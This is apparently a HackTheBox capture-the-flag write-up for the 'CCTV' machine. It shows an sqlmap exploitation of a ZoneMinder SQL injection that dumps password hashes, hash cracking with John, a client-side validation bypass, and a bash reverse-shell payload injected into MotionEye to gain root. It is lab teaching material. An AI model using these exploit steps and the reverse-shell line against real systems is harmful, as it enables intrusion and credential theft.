CCTV
Machine Info
| Field | Details |
|---|---|
| Machine Name | CCTV |
| OS | Linux |
| Difficulty | Easy |
| Status | Pwned |
Tools Used
- SQLMAP
- Nmap
- netcat
- johntheripper
Summary
Exploited a blind SQL injection (CVE-2024-51482) in ZoneMinder 1.37.63 to extract and crack a bcrypt password hash, then escalated by injecting a reverse shell into MotionEye 0.43.1b4's config field (CVE-2025-60787) after bypassing client-side validation via the browser console.
Reconnaissance
Initial Scan (NMAP)
Initial recon reveals us that port 22 and port 80 are open. Port 80 is running an apache server.
──(kali㉿kali)-[~/HTB/CCTV/recon]
└─$ nmap -sC -sV -A 10.129.100.125 -oN scan.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-02 19:55 -0400
Nmap scan report for 10.129.100.125
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open http Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://cctv.htb/
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 178.77 ms 10.10.14.1
2 178.82 ms 10.129.100.125
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.19 seconds
Open Ports:
| Port | Service | Version | Notes |
|---|---|---|---|
| 22 | SSH | ||
| 80 | ZoneMinder | v1.37.63 | running on default credentials admin:admin |
| 8765 | MotionEye | v< 0.43.1b5 | Discovered after initial access that the service<br>is running internally. |
Web Enumeration (if applicable)
Further enumeration and visiting the site manually reveals that the website is running the ZoneMinder app for staff login.
ZoneMinder is ==a free, open-source video management and surveillance software application designed primarily for Linux systems==.
CVEs / Vulnerabilities Identified
ZoneMinder v1.37.63 is affected by CVE-2024-51482, a critical boolean-based SQL injection vulnerability. The flaw resides in the web application's event handling logic (specifically in web/ajax/event.php), allowing low-privileged or unauthenticated attackers to execute arbitrary SQL commands.
| CVE | Description | Severity |
|---|---|---|
| CVE-2024-51482 | # Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64 | Critical |
Initial Foothold / Initial Access
Vulnerability: CVE-2024-51482
Using this proof of concept we find out that the url below is the vulnerable point. The function tid is vulnerable to SQL Injection.
http://hostname_or_ip/zm/index.php?view=request&request=event&action=removetag&tid=1
By using sqlmap, we can automate the exploitation process by dumping the User table contents using the following command.
┌──(kali㉿kali)-[~/HTB/CCTV/sqlmap.log]
└─$ sqlmap -u 'http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1' \
--cookie="ZMSESSID=kpe92scv0lr9lc3vm75138ht32" \
--batch \
--threads=5 \
--level=3 \
--risk=2 \
-D zm -T Users -C "Id,Username,Password" \
--dump
---SNIP---
Database: zm
Table: Users
[3 entries]
+----+------------+--------------------------------------------------------------+
| Id | Username | Password |
+----+------------+--------------------------------------------------------------+
| 1 | superadmin | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| 2 | mark | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
| 3 | admin | $2y$10$t5z8uIT.n9uCdHCNidcLf.39T1Ui9nrlCkdXrzJMnJgkTiAvRUM6m |
+-
---SNIP---
Post-Exploitation
System Enumeration
SQLMAP dumps the username and password for the user mark which we can decrypt using john.
──(kali㉿kali)-[~/HTB/CCTV]
└─$ john markhash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
opensesame (?)
1g 0:00:00:31 DONE (2026-06-02 21:43) 0.03180g/s 190.0p/s 190.0c/s 190.0C/s cristhian..tuyyo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Credential Discovery
Decrypting the bcrypt password gives us the SSH login credentials for the user mark.
┌──(kali㉿kali)-[~/HTB/CCTV]
└─$ ssh mark@cctv.htb
mark@cctv.htb's password:
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-111-generic x86_64)
---SNIP---
mark@cctv:~$ ls
Credentials Found:
| Username | Password | Hash | Service |
|---|---|---|---|
| mark | opensesame | $2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. | N/A |
Lateral Movement
Further enumeration as mark reveals that the website have port 8765 open and running motion eye on it. We can reverse the ports to our server and listen to them locally.
Steps:
mark@cctv:~$ ss -tuln
Netid State Recv-Q Send-Q Local Address:Port ---SNIP--
tcp LISTEN 0 128 127.0.0.1:8765 0.0.0.0:*
---SNIP---
ssh -L 8765:127.0.0.1:8765 mark@cctv.htb
Going to the url http://127.0.0.1:8765 locally reveals that there's a motion eye service running on version 0.43.1b4 which is vulnerable to RCE via unsanitized motion config parameter. Credentials for admins can be found in the config file.
mark@cctv:~$ find / -path "*motioneye*" -name "*.conf" 2>/dev/null
/etc/motioneye/camera-1.conf
/etc/motioneye/motion.conf
/etc/motioneye/motioneye.conf
mark@cctv:~$ cat /etc/motioneye/motion.conf
# @admin_username admin
# @normal_username user
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
# @lang en
# @enabled on
# @normal_password
---SNIP---
Vulnerability: CVE-2025-60787
A command injection vulnerability in MotionEye allows attackers to achieve Remote Code Execution (RCE) by supplying malicious values in configuration fields exposed via the Web UI. (Reference: CVE-2025-60787)
configUiValid is a JavaScript function that runs in the browser before saving camera settings — it checks if the input fields contain valid characters, blocking anything that looks like shell syntax like $(). It only exists client-side meaning the server never validates the input itself, so overriding it lets anything through. It can be bypassed using the following command in website console.
configUiValid = function() { return true; };
Once bypassed, injecting a reverse shell payload in the image settings input box returns a root shell.
On kali start a listener
nc -lvnp 4444
Inject the python rev shell script into the input field.
$(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp/YOUR_KALI_IP/4444 0>&1\"')").%Y-%m-%d-%H-%M-%S
──(kali㉿kali)-[~/HTB/CCTV/svrfiles]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.100.125] 37174
bash: cannot set terminal process group (51117): Inappropriate ioctl for device
bash: no job control in this shell
root@cctv:/# whoami
root
User Flag
root@cctv:/home/sa_mark# cat user.txt
b47d816af8547f57167926be4d814eaa
Root Flag
root@cctv:~# cat root.txt
995afd6d3b5370ebc16400c0f5da53fe
Trophy
https://labs.hackthebox.com/achievement/machine/1574945/847
Completed as part of HackTheBox practice in a legal, controlled environment.